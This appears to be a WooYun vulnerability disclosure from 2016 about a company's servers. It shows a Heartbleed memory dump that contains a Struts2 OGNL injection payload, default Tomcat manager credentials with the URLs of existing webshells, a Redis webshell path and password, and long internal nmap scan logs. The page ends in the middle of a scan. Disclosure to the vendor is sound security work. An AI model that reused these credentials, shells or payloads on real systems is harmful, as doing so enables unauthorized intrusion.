乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-15: 细节已通知厂商并且等待厂商处理中 2016-04-16: 厂商已经确认,细节仅向厂商公开 2016-04-26: 细节向核心白帽子及相关领域专家公开 2016-05-06: 细节向普通白帽子公开 2016-05-16: 细节向实习白帽子公开 2016-05-31: 细节向公众公开
千疮百孔,一堆堆的shell
主站openssl心脏滴血+tomcat弱口令+大量redis未授权访问给出3个webshell1.主站openssl心脏滴血
python openssl.py **.**.**.**
0000: 02 FF FF 08 03 00 53 48 73 F0 7C CA C1 D9 02 04 ......SHs.|..... 0010: F2 1D 2D 49 F5 12 BF 40 1B 94 D9 93 E4 C4 F4 F0 ..-I...@........ 0020: D0 42 CD 44 A2 59 00 02 96 00 00 00 01 00 02 00 .B.D.Y.......... 0060: 1B 00 1C 00 1D 00 1E 00 1F 00 20 00 21 00 22 00 .......... .!.". 0070: 23 00 24 00 25 00 26 00 27 00 28 00 29 00 2A 00 #.$.%.&.'.(.).*. 0080: 2B 00 2C 00 2D 00 2E 00 2F 00 30 00 31 00 32 00 +.,.-.../.0.1.2. 0090: 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3A 00 **.**.**.**.7.8.9.:. 00a0: 3B 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 42 00 ;.<.=.>[email protected]. 00b0: 43 00 44 00 45 00 46 00 60 00 61 00 62 00 63 00 C.D.E.F.`.a.b.c. 00c0: 64 00 65 00 66 00 67 00 68 00 69 00 6A 00 6B 00 d.e.f.g.h.i.j.k. 00d0: 6C 00 6D 00 80 00 81 00 82 00 83 00 84 00 85 00 l.m............. 01a0: 20 C0 21 C0 22 C0 23 C0 24 C0 25 C0 26 C0 27 C0 .!.".#.$.%.&.'. 01b0: 28 C0 29 C0 2A C0 2B C0 2C C0 2D C0 2E C0 2F C0 (.).*.+.,.-.../. 01c0: 30 C0 31 C0 32 C0 33 C0 34 C0 35 C0 36 C0 37 C0 0.1.2.**.**.**.**.7. 01d0: 38 C0 39 C0 3A C0 3B C0 3C C0 3D C0 3E C0 3F C0 8.9.:.;.<.=.>.?. 01e0: 40 C0 41 C0 42 C0 43 C0 44 C0 45 C0 46 C0 47 C0 @.A.B.C.D.E.F.G. 01f0: 48 C0 49 C0 4A C0 4B C0 4C C0 4D C0 4E C0 4F C0 H.I.J.K.L.M.N.O. 0200: 50 C0 51 C0 52 C0 53 C0 54 C0 55 C0 56 C0 57 C0 P.Q.R.S.T.U.V.W. 0210: 58 C0 59 C0 5A C0 5B C0 5C C0 5D C0 5E C0 5F C0 X.Y.Z.[.\.].^._. 0220: 60 C0 61 C0 62 C0 63 C0 64 C0 65 C0 66 C0 67 C0 `.a.b.c.d.e.f.g. 0230: 68 C0 69 C0 6A C0 6B C0 6C C0 6D C0 6E C0 6F C0 h.i.j.k.l.m.n.o. 0240: 70 C0 71 C0 72 C0 73 C0 74 C0 75 C0 76 C0 77 C0 p.q.r.s.t.u.v.w. 0250: 78 C0 79 C0 7A C0 7B C0 7C C0 7D C0 7E C0 7F C0 x.y.z.{.|.}.~... 02c0: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 02d0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 0300: 10 00 11 00 23 00 00 00 0F 00 01 01 25 32 37 25 ....#.......%27% 0310: 32 62 25 32 37 74 63 68 65 72 2E 48 74 74 70 53 2b%27tcher.HttpS 0320: 65 72 25 32 37 25 32 62 25 32 37 76 6C 65 74 52 er%27%2b%27vletR 0330: 65 73 25 32 37 25 32 62 25 32 37 70 6F 6E 73 65 es%27%2b%27ponse 0340: 25 32 37 25 32 39 2E 67 65 74 57 72 69 74 65 72 %27%29.getWriter 0350: 25 32 38 25 32 39 2C 25 32 33 77 2E 70 72 69 6E %28%29,%23w.prin 0360: 74 6C 6E 25 32 38 25 32 37 5B 25 32 37 25 32 62 tln%28%27[%27%2b 0370: 25 32 37 6F 6B 25 32 37 25 32 62 25 32 37 5D 25 %27ok%27%2b%27]% 0380: 32 37 25 32 39 2C 25 32 33 77 2E 66 6C 75 73 68 27%29,%23w.flush 0390: 25 32 38 25 32 39 2C 25 32 33 77 2E 63 6C 6F 73 %28%29,%23w.clos 03a0: 65 25 32 38 25 32 39 7D 20 48 54 54 50 2F 31 2E e%28%29} HTTP/1. 03b0: 31 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 1..Accept-Encodi 03c0: 6E 67 3A 20 69 64 65 6E 74 69 74 79 0D 0A 52 65 ng: identity..Re 03d0: 66 65 72 65 72 3A 20 68 74 74 70 73 3A 2F 2F 77 ferer: https://w 03e0: 77 77 2E 31 36 77 69 66 69 2E 63 6F 6D 3F 72 65 **.**.**.**?re 03f0: 64 69 72 65 63 74 3A 25 32 35 7B 25 32 37 5B 25 direct:%25{%27[% 0400: 32 37 25 32 62 25 32 37 6F 6B 25 32 37 25 32 62 27%2b%27ok%27%2b 0410: 25 32 37 5D 25 32 37 7D 25 32 32 2C 25 32 32 72 %27]%27}%22,%22r 0420: 65 64 69 72 65 63 74 41 63 74 69 6F 6E 3A 25 32 edirectAction:%2 0430: 35 7B 25 32 37 5B 25 32 37 25 32 62 25 32 37 6F 5{%27[%27%2b%27o 0440: 6B 25 32 37 25 32 62 25 32 37 5D 25 32 37 7D 25 k%27%2b%27]%27}% 0450: 32 32 2C 25 32 32 61 63 74 69 6F 6E 3A 25 32 35 22,%22action:%25 0460: 7B 25 32 37 5B 25 32 37 25 32 62 25 32 37 6F 6B {%27[%27%2b%27ok 0470: 31 25 32 37 25 32 62 25 32 37 5D 25 32 37 7D 25 1%27%2b%27]%27}% 0480: 32 32 2C 25 32 32 72 65 64 69 72 65 63 74 3A 24 22,%22redirect:$ 0490: 7B 25 32 33 77 25 33 64 25 32 33 63 6F 6E 74 65 {%23w%3d%23conte 04a0: 78 74 2E 67 65 74 25 32 38 25 32 37 63 25 32 37 xt.get%28%27c%27 04b0: 25 32 62 25 32 37 6F 6D 2E 6F 70 65 6E 73 25 32 %2b%27om.opens%2 04c0: 37 25 32 62 25 32 37 79 6D 70 68 6F 6E 79 2E 78 7%2b%27ymphony.x 04d0: 77 25 32 37 25 32 62 25 32 37 6F 72 6B 32 2E 64 w%27%2b%27ork2.d 04e0: 69 73 70 61 25 32 37 25 32 62 25 32 37 74 63 68 ispa%27%2b%27tch 04f0: 65 72 2E 48 74 74 70 53 65 72 25 32 37 25 32 62 er.HttpSer%27%2b 0500: 25 32 37 76 6C 65 74 52 65 73 25 32 37 25 32 62 %27vletRes%27%2b 0510: 25 32 37 70 6F 6E 73 65 25 32 37 25 32 39 2E 67 %27ponse%27%29.g 0520: 65 74 57 72 69 74 65 72 25 32 38 25 32 39 2C 25 etWriter%28%29,% 0530: 32 33 77 2E 70 72 69 6E 74 6C 6E 25 32 38 25 32 23w.println%28%2 0540: 37 5B 25 32 37 25 32 62 25 32 37 6F 6B 25 32 37 7[%27%2b%27ok%27 0550: 25 32 62 25 32 37 5D 25 32 37 25 32 39 2C 25 32 %2b%27]%27%29,%2 0560: 33 77 2E 66 6C 75 73 68 25 32 38 25 32 39 2C 25 3w.flush%28%29,% 0570: 32 33 77 2E 63 6C 6F 73 65 25 32 38 25 32 39 7D 23w.close%28%29} 0580: 25 32 32 2C 25 32 32 72 65 64 69 72 65 63 74 41 %22,%22redirectA 0590: 63 74 69 6F 6E 3A 24 7B 25 32 33 77 25 33 64 25 ction:${%23w%3d% 05a0: 32 33 63 6F 6E 74 65 78 74 2E 67 65 74 25 32 38 23context.get%28 05b0: 25 32 37 63 25 32 37 25 32 62 25 32 37 6F 6D 2E %27c%27%2b%27om. 05c0: 6F 70 65 6E 73 25 32 37 25 32 62 25 32 37 79 6D opens%27%2b%27ym 05d0: 70 68 6F 6E 79 2E 78 77 25 32 37 25 32 62 25 32 phony.xw%27%2b%2 05e0: 37 6F 72 6B 32 2E 64 69 73 70 61 25 32 37 25 32 7ork2.dispa%27%2 05f0: 62 25 32 37 74 63 68 65 72 2E 48 74 74 70 53 65 b%27tcher.HttpSe 0600: 72 25 32 37 25 32 62 25 32 37 76 6C 65 74 52 65 r%27%2b%27vletRe 0610: 73 25 32 37 25 32 62 25 32 37 70 6F 6E 73 65 25 s%27%2b%27ponse% 0620: 32 37 25 32 39 2E 67 65 74 57 72 69 74 65 72 25 27%29.getWriter% 0630: 32 38 25 32 39 2C 25 32 33 77 2E 70 72 69 6E 74 28%29,%23w.print 0640: 6C 6E 25 32 38 25 32 37 5B 25 32 37 25 32 62 25 ln%28%27[%27%2b% 0650: 32 37 6F 6B 25 32 37 25 32 62 25 32 37 5D 25 32 27ok%27%2b%27]%2 0660: 37 25 32 39 2C 25 32 33 77 2E 66 6C 75 73 68 25 7%29,%23w.flush% 0670: 32 38 25 32 39 2C 25 32 33 77 2E 63 6C 6F 73 65 28%29,%23w.close 0680: 25 32 38 25 32 39 7D 25 32 32 2C 25 32 32 61 63 %28%29}%22,%22ac 0690: 74 69 6F 6E 3A 25 32 35 7B 25 32 33 77 25 33 64 tion:%25{%23w%3d 06a0: 25 32 33 63 6F 6E 74 65 78 74 2E 67 65 74 25 32 %23context.get%2 06b0: 38 25 32 37 63 25 32 37 25 32 62 25 32 37 6F 6D 8%27c%27%2b%27om 06c0: 2E 6F 70 65 6E 73 25 32 37 25 32 62 25 32 37 79 .opens%27%2b%27y 06d0: 6D 70 68 6F 6E 79 2E 78 77 25 32 37 25 32 62 25 mphony.xw%27%2b% 06e0: 32 37 6F 72 6B 32 2E 64 69 73 70 61 25 32 37 25 27ork2.dispa%27% 06f0: 32 62 25 32 37 74 63 68 65 72 2E 48 74 74 70 53 2b%27tcher.HttpS 0700: 65 72 25 32 37 25 32 62 25 32 37 76 6C 65 74 52 er%27%2b%27vletR 0710: 65 73 25 32 37 25 32 62 25 32 37 70 6F 6E 73 65 es%27%2b%27ponse 0720: 25 32 37 25 32 39 2E 67 65 74 57 72 69 74 65 72 %27%29.getWriter 0730: 25 32 38 25 32 39 2C 25 32 33 77 2E 70 72 69 6E %28%29,%23w.prin 0740: 74 6C 6E 25 32 38 25 32 37 5B 25 32 37 25 32 62 tln%28%27[%27%2b 0750: 25 32 37 6F 6B 25 32 37 25 32 62 25 32 37 5D 25 %27ok%27%2b%27]% 0760: 32 37 25 32 39 2C 25 32 33 77 2E 66 6C 75 73 68 27%29,%23w.flush 0770: 25 32 38 25 32 39 2C 25 32 33 77 2E 63 6C 6F 73 %28%29,%23w.clos 0780: 65 25 32 38 25 32 39 7D 0D 0A 48 6F 73 74 3A 20 e%28%29}..Host: 0790: 77 77 77 2E 31 36 77 69 66 69 2E 63 6F 6D 0D 0A **.**.**.**.. 07a0: 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A Accept-Language: 07b0: 20 65 6E 2D 75 73 3B 71 3D 30 2E 35 2C 65 6E 3B en-us;q=0.5,en; 07c0: 71 3D 30 2E 33 0D 0A 43 6F 6E 6E 65 63 74 69 6F q=0.3..Connectio 07d0: 6E 3A 20 63 6C 6F 73 65 0D 0A 55 73 65 72 2D 41 n: close..User-A 07e0: 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E gent: Mozilla/5. 07f0: 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 0 (Windows NT 6. 0800: 31 3B 20 57 4F 57 36 34 3B 20 72 76 3A 32 31 2E 1; WOW64; rv:21. 0810: 30 29 20 47 65 63 6B 6F 2F 32 30 31 30 30 31 30 0) Gecko/2010010 0820: 31 20 46 69 72 65 66 6F 78 2F 32 31 2E 30 20 4E 1 Firefox/21.0 N 0830: 67 53 70 69 64 65 72 2F 32 35 38 0D 0A 0D 0A A9 gSpider/258.....
2.两处tomcat弱口令导致getshellhttp://**.**.**.**:2348/manager/htmlhttp://**.**.**.**:6118/manager/html这两个端口对应两台内网服务器分别是:**.**.**.**\**.**.**.**密码都是admin/admin发现都被前人搞过,我是发现即提交,好几处shell,请自查shell地址:http://**.**.**.**:2348/app/app1.jsphttp://**.**.**.**:6118/iswins/index.jsp
3.好多redis未授权访问,可shellshell一个为例:**.**.**.**:8080/redis.php 密码:c涉及ip**.**.**.**:7001~4**.**.**.**:6381**.**.**.**:7963**.**.**.**:6380**.**.**.**:7963**.**.**.**:7963**.**.**.**:8063**.**.**.**:8063**.**.**.**:8063
有了shell,前面服务器装了nmap,简单检测开了哪些服务
[/home/Qica1/project/]$ nmap **.**.**.**-255Starting Nmap 5.51 ( http://**.**.**.** ) at 2016-04-14 17:28 CSTNmap scan report for bogon (**.**.**.**)Host is up (0.000092s latency).Not shown: 993 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysql8009/tcp open ajp138080/tcp open http-proxyMAC Address: E0:DB:55:01:B3:BC (Unknown)Nmap scan report for **.**.**.**Host is up (0.000091s latency).Not shown: 996 closed portsPORT STATE SERVICE22/tcp open ssh25/tcp open smtp111/tcp open rpcbind3306/tcp open mysqlMAC Address: 90:B1:1C:03:53:27 (Unknown)Nmap scan report for bogon (**.**.**.**)Host is up (0.00021s latency).Not shown: 992 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh25/tcp open smtp80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind2049/tcp open nfs8082/tcp open blackice-alertsMAC Address: 90:B1:1C:03:95:E2 (Unknown)Nmap scan report for bogon (**.**.**.**)Host is up (0.00010s latency).Not shown: 995 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysqlMAC Address: D4:AE:52:B1:05:7C (Unknown)Nmap scan report for **.**.**.**Host is up (0.00011s latency).Not shown: 995 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysqlMAC Address: D4:AE:52:B1:05:7C (Unknown)Nmap scan report for bogon (**.**.**.**)Host is up (0.00011s latency).Not shown: 993 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind873/tcp open rsync3306/tcp open mysql8081/tcp open blackice-icecapMAC Address: 90:B1:1C:01:6E:08 (Unknown)Nmap scan report for **.**.**.** (**.**.**.**)Host is up (0.00010s latency).Not shown: 992 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind873/tcp open rsync3306/tcp open mysql8009/tcp open ajp13MAC Address: 90:B1:1C:03:76:2F (Unknown)Nmap scan report for localhost (**.**.**.**)Host is up (0.000019s latency).Not shown: 991 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind443/tcp open https2049/tcp open nfs3306/tcp open mysql3690/tcp open svn8009/tcp open ajp13Nmap scan report for **.**.**.**Host is up (0.00012s latency).Not shown: 990 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind443/tcp open https873/tcp open rsync2049/tcp open nfs8888/tcp open sun-answerbook54328/tcp open unknownMAC Address: 70:E2:84:08:28:15 (Unknown)Nmap scan report for **.**.**.**0Host is up (0.000093s latency).Not shown: 995 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysql8083/tcp open us-srvMAC Address: 70:E2:84:08:28:39 (Unknown)Nmap scan report for **.**.**.**1Host is up (0.00012s latency).Not shown: 989 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysql8009/tcp open ajp138080/tcp open http-proxy8081/tcp open blackice-icecap8083/tcp open us-srv8086/tcp open d-s-n9011/tcp open unknownMAC Address: 90:B1:1C:03:4C:66 (Unknown)Nmap scan report for bogon (**.**.**.**2)Host is up (0.000089s latency).Not shown: 995 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh111/tcp open rpcbind3306/tcp open mysql8082/tcp open blackice-alertsMAC Address: 90:B1:1C:03:C4:AC (Unknown)Nmap scan report for **.**.**.**3Host is up (0.000084s latency).Not shown: 986 closed portsPORT STATE SERVICE80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds3306/tcp open mysql3389/tcp open ms-term-serv5800/tcp open vnc-http5900/tcp open vnc8083/tcp open us-srv49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknownMAC Address: 90:B1:1C:01:78:D9 (Unknown)Nmap scan report for bogon (**.**.**.**4)Host is up (0.000080s latency).Not shown: 979 closed portsPORT STATE SERVICE21/tcp open ftp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds1025/tcp open NFS-or-IIS1026/tcp open LSA-or-nterm1027/tcp open IIS1030/tcp open iad11119/tcp open bnetgame1433/tcp open ms-sql-s3306/tcp open mysql3389/tcp open ms-term-serv4004/tcp open pxc-roid5003/tcp open filemaker5633/tcp open beorl5800/tcp open vnc-http5900/tcp open vnc6101/tcp open backupexec6106/tcp open isdninfo10000/tcp open snet-sensor-mgmtMAC Address: 90:B1:1C:04:FC:D7 (Unknown)Nmap scan report for bogon (**.**.**.**5)Host is up (0.00015s latency).Not shown: 992 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http3306/tcp open mysql7000/tcp open afs3-fileserver8000/tcp open http-alt8010/tcp open xmpp55055/tcp open unknownMAC Address: D4:AE:52:E6:77:08 (Unknown)Nmap scan report for **.**.**.**6Host is up (0.00016s latency).Not shown: 996 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysqlMAC Address: D4:AE:52:E6:75:3D (Unknown)Nmap scan report for bogon (**.**.**.**1)Host is up (0.000096s latency).Not shown: 994 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind3306/tcp open mysql8088/tcp open radan-httpMAC Address: C8:1F:66:ED:E7:EB (Unknown)Nmap scan report for bogon (**.**.**.**2)Host is up (0.00011s latency).Not shown: 994 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind8009/tcp open ajp138088/tcp open radan-httpMAC Address: C8:1F:66:EE:0F:2F (Unknown)Nmap scan report for **.**.**.**4Host is up (0.00013s latency).Not shown: 990 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind443/tcp open https873/tcp open rsync2049/tcp open nfs3306/tcp open mysql8009/tcp open ajp138080/tcp open http-proxy9090/tcp open zeus-adminMAC Address: 90:B1:1C:04:FC:EF (Unknown)Nmap scan report for bogon (**.**.**.**5)Host is up (0.00015s latency).Not shown: 994 closed portsPORT STATE SERVICE22/tcp open ssh81/tcp open hosts2-ns82/tcp open xfer111/tcp open rpcbind2049/tcp open nfs49156/tcp open unknownMAC Address: 90:B1:1C:01:78:1C (Unknown)Nmap scan report for bogon (**.**.**.**6)Host is up (0.00013s latency).Not shown: 996 closed portsPORT STATE SERVICE22/tcp open ssh81/tcp open hosts2-ns82/tcp open xfer111/tcp open rpcbindMAC Address: C8:1F:66:ED:F3:51 (Unknown)Nmap scan report for **.**.**.**4Host is up (0.00015s latency).Not shown: 996 closed portsPORT STATE SERVICE22/tcp open ssh53/tcp open domain161/tcp open snmp443/tcp open httpsMAC Address: 00:23:E9:37:8C:05 (F5 Networks)Nmap scan report for bogon (**.**.**.**5)Host is up (0.00015s latency).Not shown: 996 closed portsPORT STATE SERVICE22/tcp open ssh53/tcp open domain161/tcp open snmp443/tcp open httpsMAC Address: 00:01:D7:EF:1A:C5 (F5 Networks)Nmap scan report for bogon (**.**.**.**6)Host is up (0.00014s latency).Not shown: 996 closed portsPORT STATE SERVICE22/tcp open ssh53/tcp open domain161/tcp open snmp443/tcp open httpsMAC Address: 00:23:E9:37:8C:05 (F5 Networks)Nmap scan report for **.**.**.**7Host is up (0.00015s latency).Not shown: 997 closed portsPORT STATE SERVICE111/tcp open rpcbind3000/tcp open ppp8333/tcp open unknownMAC Address: 14:18:77:53:E0:AD (Unknown)Nmap scan report for bogon (**.**.**.**9)Host is up (0.00016s latency).Not shown: 999 filtered portsPORT STATE SERVICE22/tcp open sshMAC Address: F8:0F:41:FA:D2:B1 (Wistron InfoComm(ZhongShan))Nmap scan report for **.**.**.**Host is up (0.000095s latency).Not shown: 985 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysql7001/tcp open afs3-callback7002/tcp open afs3-prserver7004/tcp open afs3-kaserver8010/tcp open xmpp8011/tcp open unknown8083/tcp open us-srv8090/tcp open unknown9001/tcp open tor-orport9002/tcp open dynamid9011/tcp open unknownMAC Address: C8:1F:66:E3:83:A8 (Unknown)Nmap scan report for **.**.**.**02Host is up (0.00018s latency).Not shown: 995 filtered portsPORT STATE SERVICE20/tcp closed ftp-data21/tcp open ftp22/tcp open ssh80/tcp open http7000/tcp open afs3-fileserverMAC Address: C8:1F:66:E5:77:5D (Unknown)Nmap scan report for bogon (**.**.**.**03)Host is up (0.00012s latency).Not shown: 993 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http90/tcp open dnsix111/tcp open rpcbind3306/tcp open mysql8009/tcp open ajp13MAC Address: C8:1F:66:E3:B9:19 (Unknown)Nmap scan report for bogon (**.**.**.**51)Host is up (0.00014s latency).Not shown: 998 closed portsPORT STATE SERVICE80/tcp filtered http81/tcp open hosts2-nsMAC Address: 00:01:D7:EF:1A:C5 (F5 Networks)Nmap scan report for **.**.**.**48Host is up (0.000093s latency).Not shown: 986 closed portsPORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds1021/tcp open exp11099/tcp open rmiregistry3389/tcp open ms-term-serv8888/tcp open sun-answerbook49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49157/tcp open unknown49160/tcp open unknown49175/tcp open unknownMAC Address: C8:1F:66:CF:53:C2 (Unknown)Nmap scan report for bogon (**.**.**.**49)Host is up (0.00011s latency).Not shown: 998 closed portsPORT STATE SERVICE22/tcp open ssh443/tcp open httpsMAC Address: 00:0B:AB:53:FE:43 (Advantech Technology (china) Co.)Nmap scan report for bogon (**.**.**.**50)Host is up (0.021s latency).Not shown: 997 closed portsPORT STATE SERVICE21/tcp filtered ftp22/tcp filtered ssh23/tcp open telnetMAC Address: 70:7B:E8:C5:6E:A8 (Unknown)Nmap scan report for **.**.**.**54Host is up (0.00019s latency).Not shown: 998 filtered portsPORT STATE SERVICE23/tcp open telnet9999/tcp open abyssMAC Address: 00:E0:4C:11:16:6B (Realtek Semiconductor)[/]$ nmap **.**.**.**-255Starting Nmap 5.51 ( http://**.**.**.** ) at 2016-04-15 13:45 CSTNmap scan report for bogon (**.**.**.**)Host is up (0.000080s latency).Not shown: 993 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysql8009/tcp open ajp138080/tcp open http-proxyMAC Address: E0:DB:55:01:B3:BD (Unknown)Nmap scan report for **.**.**.**Host is up (0.000080s latency).Not shown: 997 closed portsPORT STATE SERVICE22/tcp open ssh111/tcp open rpcbind3306/tcp open mysqlMAC Address: 90:B1:1C:03:53:28 (Unknown)Nmap scan report for bogon (**.**.**.**)Host is up (0.000074s latency).Not shown: 993 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind2049/tcp open nfs8082/tcp open blackice-alertsMAC Address: 90:B1:1C:03:95:E3 (Unknown)Nmap scan report for bogon (**.**.**.**)Host is up (0.00010s latency).Not shown: 995 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysqlMAC Address: D4:AE:52:B1:05:7D (Unknown)Nmap scan report for **.**.**.**Host is up (0.000099s latency).Not shown: 993 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind873/tcp open rsync3306/tcp open mysql8081/tcp open blackice-icecapMAC Address: 90:B1:1C:01:6E:09 (Unknown)Nmap scan report for bogon (**.**.**.**)Host is up (0.000093s latency).Not shown: 992 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind873/tcp open rsync3306/tcp open mysql8009/tcp open ajp13MAC Address: 90:B1:1C:03:76:30 (Unknown)Nmap scan report for bogon (**.**.**.**)Host is up (0.000015s latency).Not shown: 991 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind443/tcp open https2049/tcp open nfs3306/tcp open mysql3690/tcp open svn8009/tcp open ajp13Nmap scan report for bogon (**.**.**.**)Host is up (0.00010s latency).Not shown: 990 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind443/tcp open https873/tcp open rsync2049/tcp open nfs8888/tcp open sun-answerbook54328/tcp open unknownMAC Address: 70:E2:84:08:28:16 (Unknown)Nmap scan report for **.**.**.**0Host is up (0.000073s latency).Not shown: 995 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysql8083/tcp open us-srvMAC Address: 70:E2:84:08:28:3A (Unknown)Nmap scan report for **.**.**.**1Host is up (0.00012s latency).Not shown: 989 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysql8009/tcp open ajp138080/tcp open http-proxy8081/tcp open blackice-icecap8083/tcp open us-srv8086/tcp open d-s-n9011/tcp open unknownMAC Address: 90:B1:1C:03:4C:67 (Unknown)Nmap scan report for **.**.**.**2Host is up (0.00012s latency).Not shown: 995 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh111/tcp open rpcbind3306/tcp open mysql8082/tcp open blackice-alertsMAC Address: 90:B1:1C:03:C4:AD (Unknown)Nmap scan report for **.**.**.**3Host is up (0.000087s latency).Not shown: 986 closed portsPORT STATE SERVICE80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds3306/tcp open mysql3389/tcp open ms-term-serv5800/tcp open vnc-http5900/tcp open vnc8083/tcp open us-srv49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknownMAC Address: 90:B1:1C:01:78:DA (Unknown)Nmap scan report for **.**.**.**4Host is up (0.000084s latency).Not shown: 979 closed portsPORT STATE SERVICE21/tcp open ftp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds1025/tcp open NFS-or-IIS1026/tcp open LSA-or-nterm1027/tcp open IIS1030/tcp open iad11119/tcp open bnetgame1433/tcp open ms-sql-s3306/tcp open mysql3389/tcp open ms-term-serv4004/tcp open pxc-roid5003/tcp open filemaker5633/tcp open beorl5800/tcp open vnc-http5900/tcp open vnc6101/tcp open backupexec6106/tcp open isdninfo10000/tcp open snet-sensor-mgmtMAC Address: 90:B1:1C:04:FC:D8 (Unknown)Nmap scan report for **.**.**.**5Host is up (0.00017s latency).Not shown: 992 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open http3306/tcp open mysql7000/tcp open afs3-fileserver8000/tcp open http-alt8010/tcp open xmpp55055/tcp open unknownMAC Address: D4:AE:52:E6:77:0A (Unknown)Nmap scan report for **.**.**.**6Host is up (0.00015s latency).Not shown: 996 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind3306/tcp open mysqlMAC Address: D4:AE:52:E6:75:3F (Unknown)Nmap scan report for **.**.**.**1Host is up (0.000095s latency).Not shown: 994 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind3306/tcp open mysql8088/tcp open radan-httpMAC Address: C8:1F:66:ED:E7:EC (Unknown)Nmap scan report for **.**.**.**2Host is up (0.000092s latency).Not shown: 994 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http81/tcp open hosts2-ns111/tcp open rpcbind8009/tcp open ajp138088/tcp open radan-httpMAC Address: C8:1F:66:EE:0F:30 (Unknown)Nmap scan report for **.**.**.**3Host is up (0.000099s latency).Not shown: 990 closed portsPORT STATE SERVICE80/tcp open http81/tcp open hosts2-ns82/tcp open xfer83/tcp open mit-ml-dev111/tcp open rpcbind1099/tcp open rmiregistry1875/tcp open westell-stats2049/tcp open nfs3306/tcp open mysql8080/tcp open http-proxyMAC Address: 70:E2:84:06:32:26 (Unknown)Nmap scan report for **.**.**.**4Host is up (0.00012s latency).Not shown: 990 closed portsPORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind443/tcp open https873/tcp open rsync2049/tcp open nfs3306/tcp open mysql8009/tcp open ajp138080/tcp open http-proxy9090/tcp open zeus-adminMAC Address: 90:B1:1C:04:FC:F0 (Unknown)Nmap scan report for bogon (**.**.**.**5)Host is up (0.00012s latency).Not shown: 994 closed portsPORT STATE SERVICE22/tcp open ssh81/tcp open hosts2-ns82/tcp open xfer111/tcp open rpcbind2049/tcp open nfs49156/tcp open unknownMAC Address: 90:B1:1C:01:78:1D (Unknown)Nmap scan report for **.**.**.**6Host is up (0.00017s latency).Not shown: 995 filtered portsPORT STATE SERVICE22/tcp open ssh80/tcp closed http81/tcp open hosts2-ns8081/tcp closed blackice-icecap8082/tcp closed blackice-alertsMAC Address: 